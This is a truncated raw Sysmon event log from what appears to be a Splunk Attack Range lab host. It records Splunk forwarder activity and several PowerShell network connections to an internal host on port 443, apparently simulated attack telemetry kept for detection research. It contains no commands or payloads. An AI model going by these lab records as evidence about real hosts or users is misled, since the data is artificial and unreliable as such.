18:13:13.973{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084872Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.973{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084871Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.973{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4EB9-613A-4B90-03000000C801}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084870Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.973{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4EB9-613A-4B90-03000000C801}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084869Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.958{B81B27B7-4EB9-613A-4B90-03000000C801}2956C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084868Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.625{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=88A8FE72868394CCFA7A919822F82EAB,SHA256=0C61DCAD36EAE8B5FE05EA16B019D0E0A4CBCEF85F05A3A58C3F8586D6579B03,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084867Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.473{B81B27B7-4EB9-613A-4A90-03000000C801}57405348C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084866Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.289{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4EB9-613A-4A90-03000000C801}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084865Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.289{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084864Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.289{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084863Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.289{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084862Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.289{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084861Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.289{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4EB9-613A-4A90-03000000C801}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084860Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.289{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4EB9-613A-4A90-03000000C801}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084859Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:13.274{B81B27B7-4EB9-613A-4A90-03000000C801}5740C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x800000000000000035084881Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:39.342{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56664-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084880Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:14.659{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64600A3008C08F5858956773692EDE9B,SHA256=F696BE6DEED38FFFA475900DA12DDC826FEA4ED11515FE92471A7F2480172FCA,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084879Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:14.358{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8B289F3C0C1A662EFBD665863DBFF782,SHA256=805369D84F7E6FC7F25D31B3FB297B874EDE3A25A966EB24AFF5E3B4BD3F4BF1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084878Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:14.288{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CAA73585D093A0AB854CCCE87B7D0296,SHA256=528F00CE51100719CA40460F6616B574098A9CD3F49227C37BB94E2195C3AD5D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084877Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:14.288{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8489B0205C0F41184CC14ECBB5871368,SHA256=DF94002A60298F9F3B22D9ED02D33DE7D99388077F7D750D59E47C37F6EA8FC6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084882Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:15.690{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1FAD0F360E895B1A7FC75C723B6CAE1,SHA256=212D9C7BEEE54F8BF0909C97CD3A758E2E7FDAFE5BB8BD7F13EDFB9EEF67C0A0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084883Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:16.704{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=37DC3081A72B51A1B22B3EC4758346A7,SHA256=43F7545E3C04F77F2469AB1BA3349B40CCFCBAE76D05E77178600AD71E774EE0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084885Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:41.226{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56665-false10.0.1.12-8000- 23542300x800000000000000035084884Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:17.724{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AAFC79C6B48FCE666DD74E0C7F43198,SHA256=6C03AE4448CB6FE75F43DB58DF1FB414903B71F35A4BE8635F9BCA47BD23684D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084887Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:18.741{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE5EF4B478557E54AB9EE31D08F982D7,SHA256=1C19687B26A5165DF6870E14AC578EA78755B5F74B4A014B8ABC9BD68D4C580E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084886Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:18.388{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=A58FCFE30563B4EC67A29DBA5FAD70CA,SHA256=B4931ECD3376EC8731EF523EF8425D26F68733B34DECAA9466D2FD797112A658,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084889Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:19.772{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48B55AFF5FE7742E0DF5F63974553A83,SHA256=3E3A9824F2BD45705139678E767EB5C7345280441BB51198090417E3C1051F65,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084888Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:43.378{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56666-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084890Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:20.820{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=940433998FE179A5E3151346A9B4773E,SHA256=4D4972135DC4305822B857F56BE5E243A3DDF1D6964E9D8998AF7305F79B950B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084891Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:21.839{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9ADF62C70BE76548C5B24190AD880316,SHA256=87F112BAC9CCA1A2D6781627BD7D88822F7C25347016487BF4368C8A8A6D8E54,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084893Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:22.857{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=983EDF9F7DC86D7974CD6BCD4FD2379F,SHA256=51C9463DA40153AA9BD860C5E40C18FCA017C902FCD9E43B5568C3060CFE19A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084892Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:22.422{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8D037CA7CAE2E6CA7DD9745C026522A0,SHA256=81C052D61503A371F68343AA4544219BEFF52C18CCB0D0F2CCFD5A75C3F44209,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084895Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:23.872{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20FD24FBBE4D033EB7B42D26A089E2A8,SHA256=950E3C95F948CBB05075769D632F05FC5A68793517F8CE75D851B3C4E70CE50F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084894Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:47.142{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56667-false10.0.1.12-8000- 23542300x800000000000000035084897Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:24.902{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8F3B213435BC7DF28B3FF858C0666FA,SHA256=5B040553768EE796999F0642BC4195A2A575989BD7432152083D31C795605981,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084896Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:47.392{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56668-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084898Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:25.919{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8E867FE3BAD7C8E20494CA1E850C3F71,SHA256=DD1BE522008D0999BCDE38382C8485B4C3230FEB1F6DB80CA7D692DAF7A8B15B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084899Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:26.938{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D5172B71B94990DB6914DD06913E1198,SHA256=41B584A8E485F4FB325D271F6B2ECAA7D031E1B19ECF87DAECC26C69E4507D17,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084901Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:27.953{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C60F647D6B7F8FBEB127EF60445DAD9,SHA256=169278DC312EFC2CA9BF9174FCCC6879AE8436B0BA98C35E771E9EA8294CFAF4,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084900Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:27.421{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=8CD3DB8932BA2D54AA108281AB6B7CBF,SHA256=40DD5BDA61D3003D5F63D2308273101C3094DF1183222A5AC16EC3796C66C46E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084920Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:28.984{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 